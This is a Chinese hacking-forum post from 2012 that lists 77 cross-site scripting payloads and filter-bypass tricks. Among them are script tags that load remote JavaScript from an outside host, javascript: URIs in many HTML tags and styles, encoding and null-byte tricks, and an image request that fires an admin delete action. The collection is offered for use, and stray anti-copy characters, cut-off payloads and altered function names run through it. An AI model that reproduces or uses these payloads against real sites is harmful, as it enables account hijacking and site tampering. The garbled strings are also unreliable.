找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3531|回复: 0
打印 上一主题 下一主题

xss跨站脚本攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:56:34 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
/ F( L0 O( n/ O
  W. a) v' u! g (1)普通的XSS JavaScript注入4 P3 r* G- Q7 O  R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>0 N2 T' U! w! C

- H4 j$ X+ V' e% v (2)IMG标签XSS使用JavaScript命令
3 O! u/ l8 K0 K$ ^2 n <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
* t- y( }5 P; \2 m- K, Z2 z" S& R7 x$ T
(3)IMG标签无分号无引号
/ E2 e; {0 T5 C$ g <IMG SRC=javascript:alert(‘XSS’)>5 H* j+ i/ s/ J& _5 A* ]$ H2 H6 T# \8 i

, C% A# H6 H6 z, m (4)IMG标签大小写不敏感2 P. n) |& [; N7 X3 k1 R% E6 j
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
" F6 t( {8 Y3 B0 H, g4 ]/ i  ?6 ^7 Y2 n" E
(5)HTML编码(必须有分号)8 W1 ^" @% c/ P7 z1 v* a
<IMG SRC=javascript:alert(“XSS”)>
1 X# I" q, _9 G4 }' c- b2 L4 f% r
! G. B; X6 p& R! v. Z (6)修正缺陷IMG标签2 C$ _/ b# O, a5 W$ t6 E) g1 O
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>- D# E4 Q# K# S4 Z# n
, `# U2 ^  M+ c! R; }' Q
(7)formCharCode标签(计算器)
) M! m( B0 S) `8 t <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>1 k9 M2 a- D; E/ Z3 ~# f
2 a. P$ V  A! }+ d( Q
(8)UTF-8的Unicode编码(计算器)
5 S* P* K, \3 r- @' ?+ K <IMG SRC=jav..省略..S')>
/ h% @  g) g" G# `) j( z4 d
/ y2 Y9 b' H% D( h- d2 H1 I (9)7位的UTF-8的Unicode编码是没有分号的(计算器)
$ y1 L& u; W" _# |& Y <IMG SRC=jav..省略..S')>" n. E3 _1 |3 N8 Y
5 z  a- t: G' L4 o7 i
(10)十六进制编码也是没有分号(计算器)
2 q1 k, n8 O/ J3 C <IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
" @* [( n) ~' l7 ]  _3 K* X2 \4 B8 ^' A% U, f' s
(11)嵌入式标签,将Javascript分开7 Z# }8 m4 d* u" e
<IMG SRC=”jav ascript:alert(‘XSS’);”>9 q5 C' O+ `6 `

# I! F+ h6 z( |& k9 @, ^: D (12)嵌入式编码标签,将Javascript分开
% _6 ~, q# w: k% U# j0 ] <IMG SRC=”jav ascript:alert(‘XSS’);”>
% o7 ~9 Z" U4 d  i/ z2 j. W8 N; |* [  i% X' l
(13)嵌入式换行符6 c8 F: @* M- y
<IMG SRC=”jav ascript:alert(‘XSS’);”>6 R0 g' I4 V! \' {$ d/ Y2 }
( c) {& Y3 e: e: g/ s, z
(14)嵌入式回车
9 K7 }- [$ C; o4 c+ u1 B <IMG SRC=”jav ascript:alert(‘XSS’);”>
3 d1 b3 v" D8 W% b6 D/ n% s- Y( P2 ?, R* c
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
# s; K/ R$ B# q* @" K( B <IMG SRC=”javascript:alert(‘XSS‘)”>
+ k( U* E% l* n2 W8 B
, U2 G7 w: L5 X6 A) Y (16)解决限制字符(要求同页面)9 d  L* J- u$ Z% }8 H
<script>z=’document.’</script>: \" a/ S9 S' U7 s( u
<script>z=z+’write(“‘</script>7 [3 }7 g9 v7 W. y
<script>z=z+’<script’</script>
5 B5 Q/ g" b* a: [9 g0 c <script>z=z+’ src=ht’</script>' e) W1 H$ H6 z( _- p6 f
<script>z=z+’tp://ww’</script>
& R8 i  q: C0 u( k <script>z=z+’w.shell’</script>
) [. c% g' ~1 w* D! [1 ] <script>z=z+’.net/1.’</script>
% l/ H3 O" W: O5 h4 x$ w <script>z=z+’js></sc’</script>
- r0 Y, i) z2 r0 Y <script>z=z+’ript>”)’</script>/ o  q" X( `. E8 z  a4 R# Y
<script>eval_r(z)</script>
3 H  n8 z3 d! ^3 O) ^3 }, T* R6 @/ D2 U+ F+ w; \( S
(17)空字符6 D5 c7 G3 c5 \8 m% j" z5 U/ c
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
. O7 {' I6 s+ k2 t0 \# B' z4 K' |
: T% W# {& n; u# d( j (18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
/ x& V% N6 M+ [$ [/ l& {# d) l perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
* |5 @8 H* b# b: q6 B3 e2 U8 z7 o2 x& {
(19)Spaces和meta前的IMG标签4 c- O8 d) x. k  u" A: b
<IMG SRC=”   javascript:alert(‘XSS’);”>
5 R/ T& ]( l7 J; q9 w
# Y6 u8 P% O3 U' y( h; }# l (20)Non-alpha-non-digit XSS
9 p7 M3 o7 j6 S <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
$ Z2 `, r3 @; v, _% O+ f9 ?; D* e
& X, Z4 h# Z/ u1 A: U (21)Non-alpha-non-digit XSS to 2  L/ _1 {/ a& t' N3 W* S9 ~% z1 _
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>9 l# {0 x2 H; |9 j. M! f" y
# ^0 d1 o/ t: b1 d4 |9 I2 N
(22)Non-alpha-non-digit XSS to 3, f0 `" e; [  b) g/ b
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>4 _" e+ j- B6 s2 O" Z0 |6 Z, {) V

( Q! [% F! O7 [# @ (23)双开括号
) b2 A; O& Q$ e2 V <<SCRIPT>alert(“XSS”);//<</SCRIPT>) J- G- j9 n5 V
0 G3 \8 V! L( J3 n8 M; D1 Z
(24)无结束脚本标记(仅火狐等浏览器)
6 m4 @; S4 W) [) B/ z) J* N$ M9 J <SCRIPT SRC=http://3w.org/XSS/xss.js?<B>3 ?( r2 n0 e* R7 W. B; u0 o

' p7 g7 ^0 W. p5 w8 k3 T (25)无结束脚本标记2. N. w+ _+ ]4 v- G: F+ _$ N
<SCRIPT SRC=//3w.org/XSS/xss.js>; {2 y2 ]: p2 z6 E: a
8 j& X0 s, |2 S, I* q
(26)半开的HTML/JavaScript XSS
; I; N# B) y8 y8 O9 M7 {% | <IMG SRC=”javascript:alert(‘XSS’)”
# X# Y# n+ i. u' w
7 C0 C: i- P2 D4 Y6 y  W0 D& w (27)双开角括号6 V" \5 E& f; o2 f* Z8 G
<iframe src=http://3w.org/XSS.html </ o7 Y  \; }- r. |

( V4 Z  U* {- o; Q* e (28)无单引号 双引号 分号
6 B4 t5 Q4 O* |- z# v <SCRIPT>a=/XSS/
- @/ |0 W! |, Z+ u" G' N" R alert(a.source)</SCRIPT>) ~# k( M1 r2 G6 ?5 h& P7 V3 @
, p- |! s9 M- ~( `, S8 z+ c$ |
(29)换码过滤的JavaScript. q' J- w8 X+ I6 w& x( g9 i
\”;alert(‘XSS’);//( n2 G# m+ K# H: I) Y

- B% [. J% K- J+ K (30)结束Title标签' f* a9 `2 M$ n' L: S6 a
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>) m! s( ?- I  R. y- z2 S5 J
- s! y9 [6 \& m( \+ \8 @
(31)Input Image
7 ^8 `: z# C3 R7 k) H% v <INPUT SRC=”javascript:alert(‘XSS’);”>
% D$ x2 t) \! ^# b( x, {
. L' U& N( g* J/ z7 {) z (32)BODY Image9 _  X3 Q+ X+ J7 n1 V- r+ F* E
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>" ]- \4 j* W0 z; d+ H

2 ]" j4 j' T+ ~( s* G+ z2 B (33)BODY标签2 H' X. b" q3 E( n7 G3 A! g5 k
<BODY(‘XSS’)>( c" t1 o7 o% @4 _* G5 g) E

% a/ X7 e2 ~0 ~$ k (34)IMG Dynsrc4 H7 O0 [6 m+ w* c  T- {: ^
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
( z/ i: Y  r+ r$ m' m7 N6 q" t/ F
" u5 {8 @1 P3 j5 G (35)IMG Lowsrc
# a) G# H. U9 o9 Z" [& h <IMG LOWSRC=”javascript:alert(‘XSS’)”>
6 K+ K0 x% `6 C3 i5 D( b
, ?1 \: i, K% M1 I& b9 z (36)BGSOUND
9 Y) ~3 q" E0 v* I* n) W <BGSOUND SRC=”javascript:alert(‘XSS’);”>* M2 O% s  _: X- P1 R2 D
% }9 z: k/ ?: o
(37)STYLE sheet
  G. ~0 X* T) {" W( b0 ] <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>+ o3 Y( q* c& k4 }4 g7 ]0 K6 @' _
1 }' I" ~  l; {7 W% Z% ?7 @
(38)远程样式表
; m) W$ \7 |6 o' G <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
8 o- M! R: h' j8 A* z
% Z, \" M7 ^: q8 r" [ (39)List-style-image(列表式)
" v1 X; f, F; R* S <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
# @/ u' }5 y- G) u: L! x7 P- M# m" t" O" V
(40)IMG VBscript9 z; [$ n8 U; c/ D, ]
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
6 K9 d6 c+ B: r8 z! G. S* R
: v9 L3 Q4 |& Z7 n* M7 z1 H3 R$ ] (41)META链接url
* E7 t3 S7 Y* ]# ]0 a% d <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>& G  w" S$ p6 Q# o. l

- E2 A+ T) f% W, Z* J (42)Iframe
5 H7 h+ }4 W% K <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
- i; `  C" J+ j; z
- ~* P2 B: r1 c# n (43)Frame
7 e, q! J& p2 [. P' J: L+ R/ q <FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>( z5 T4 P/ @0 T5 l7 g0 F: m

5 ~5 l, Y" v( n+ [# J (44)Table6 L4 f: k0 |* D2 x) e; c
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”># c" q% N1 [9 n/ a9 d  u

+ F  n* B6 k6 F- O% z& @7 L; s (45)TD1 @6 u) r8 [7 X
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ `% K" A2 B7 g
1 n2 a+ B- H3 o& s/ X, |- {
(46)DIV background-image
  }% l: _* o( y: S" l <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
2 p* d5 r: L1 ~, S, ~2 o2 y! P4 s7 u6 S5 l# C
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
' h* g, |* i: J" [% E& t8 d* Z <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ Q) z9 e5 d* A9 P' e* H* S) h5 I. [$ Q6 }/ v  C
(48)DIV expression) d. c# k% C4 q( X: E
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
3 w* h5 E1 M3 r  V$ t% o: J( p- X
; E% W( _/ E9 e% ~4 a (49)STYLE属性分拆表达: t& ~3 r( o* v. Q8 K( i
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>5 A6 n3 r  g- k% Z7 t
. A0 M( O( A6 ~) O: s* m" x
(50)匿名STYLE(组成:开角号和一个字母开头)  |. |4 g, G( B" `8 f
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>8 i3 X& R9 f- U* I8 K* U

6 s( q; j( v/ @2 U% | (51)STYLE background-image
# g9 y. o! z/ |0 ?9 ? <STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
1 U2 n& z7 Y0 C. W5 P# w/ V0 j  o4 f6 D# w; ]
(52)IMG STYLE方式( t  J0 O5 ^4 V+ J
exppression(alert(“XSS”))’>% G6 U. X! ?( }$ `9 ?

+ r$ g* _3 C# e1 y2 k- g, ~8 a! p (53)STYLE background
* c" A! s+ |8 {( H <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>; G! a$ E& L  X! Y9 H- w8 F& C1 K

/ d. W. ^$ _  G (54)BASE: {1 S' y9 j5 V- \* ]  W" B8 e: {
<BASE HREF=”javascript:alert(‘XSS’);//”>: I* D/ [( v' n" [# A- t
. a' j3 z7 ]; R* O3 e
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 ]# b+ \0 O( n9 Y1 C- J <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>0 r) G& m: U) i. W3 H( X1 S1 x( M

6 a. o1 ]3 P$ y2 }& ~ (56)在flash中使用ActionScrpt可以混进你XSS的代码
' U1 T+ q( [% \( b; y+ j0 j* a4 E a=”get”;+ K! S' m  g7 o: z
b=”URL(\”";
# {/ q" k% t# w' s( t c=”javascript:”;
0 @  x) \: `% h d=”alert(‘XSS’);\”)”;5 z& E& I5 Z+ `( u
eval_r(a+b+c+d);
4 {! h8 z1 G$ x) J) _; n) ^3 ]5 N8 B% ]6 r
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上$ ]8 u  w; W) T6 _
<HTML xmlns:xss>$ A7 b5 x6 J, Y- l( R- t1 R
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
' I- q  I* ]+ ?% K: g3 g <xss:xss>XSS</xss:xss>" n9 p0 v, N3 L! m9 Q) b
</HTML>
! W+ s& G+ T5 [4 S  n% G1 P5 a% m, d4 D7 Q9 I/ m1 R
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用4 |" L/ x9 d0 t8 R1 [1 W
<SCRIPT SRC=””></SCRIPT>
* _6 ~% @, B2 Z" V5 {8 [4 ^1 Q; q- ~" D# \' F: l
(59)IMG嵌入式命令,可执行任意命令0 I" H( ?% j5 Z
<IMG SRC=”http://www.XXX.com/a.php?a=b”>, a! K( |4 B% w
, ?% v+ J2 g4 ?$ p% w' e: z
(60)IMG嵌入式命令(a.jpg在同服务器)' H& g; Y4 x0 H) @' b- @9 h
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
9 _( {; B! D) k/ c$ B8 H% J* q" O7 N% X& M$ G1 E7 Q
(61)绕符号过滤6 H, s7 }( O) ^1 [
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT># [. ?# [' T! m* i. C5 Q% q7 {7 C
  Z. z+ {4 E. B1 ~8 ?7 Q" W% h( I
(62)6 k9 X1 c, p8 M5 V1 g/ G7 }
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>! k3 |* z  J1 x3 Q4 V: b
6 J$ \% I1 l0 E9 c
(63)
4 \; D3 s  C0 k. y; S& ~4 H8 Y <SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>; L" V. [( R) G6 B
& m: w; N# B  W; s+ r
(64)
8 S9 V8 k, O. q+ M3 R <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
7 t$ V3 B3 P7 ~8 m# S0 U' {
8 W/ H; i- o4 j' i& i$ s, d (65)
/ @" `0 @1 j6 d+ q <SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ ^& R* `$ @  z, V* M$ |
( T# V1 ~6 p& B) L+ M+ S' l (66)
0 j' ?* Z0 E0 } <SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
- Y# v& K4 B$ d" c% j
2 d3 r2 Y3 r. j0 ]9 A (67)1 f" `( Q) i, f% e# V! U
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
4 d. }7 m2 C& o9 N( K* G
( k! u) A/ g4 ~- k/ [4 w; m (68)URL绕行6 C/ |+ A$ s. G4 }( K' m
<A HREF=”http://127.0.0.1/”>XSS</A>% g" C. v! z. z  X1 S
: k& O+ C5 [# U
(69)URL编码1 T( H8 f' R* A1 }
<A HREF=”http://3w.org”>XSS</A>5 K' \  c# M+ `2 w& |

2 w- k8 q8 j$ P$ f& V3 u0 G (70)IP十进制
; F( \+ }  Q! h. J <A HREF=”http://3232235521″>XSS</A>
8 b/ h9 w1 J: f; v7 t( h  D4 E. d& A
(71)IP十六进制
! N' `8 a7 h5 w9 [2 Z <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>: c$ C9 x4 h5 _9 D& i1 ]1 Y

' w5 j! [1 I! l8 r (72)IP八进制" Y3 o9 n* i1 t( f1 l
<A HREF=”http://0300.0250.0000.0001″>XSS</A>6 c- N' n. i3 T2 L+ v  O
/ f9 I, d/ f7 ?. `, |; S" S) j
(73)混合编码
2 Q5 l- U  t' U( F <A HREF=”h
; b$ d7 P* b6 s3 h" l% d tt p://6 6.000146.0×7.147/”">XSS</A>
' I& {/ T" g- Y) j
6 P4 D- x3 v- A) _6 d. ^ (74)节省[http:]( ~& i& V; d# I) c2 R4 v
<A HREF=”//www.google.com/”>XSS</A>
, d: ^- y3 G" I6 t2 N" ~! J0 q1 ^8 J( N
(75)节省[www]. q* E; ~, o7 F/ T% C3 Q
<A HREF=”http://google.com/”>XSS</A>5 A% f3 W9 s# f& L: t) z. Z' P5 X( E! W

8 F( j- a7 w; Y: q& U (76)绝对点绝对DNS
. P. @% ?( P( k9 V <A HREF=”http://www.google.com./”>XSS</A>+ H. X# n1 P0 v' v9 {
, {: v0 y7 x$ q) L" s: l7 `* G) z
(77)javascript链接
5 q' ^( U* b' r8 a7 S. N% a9 I1 l+ C; T7 j <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表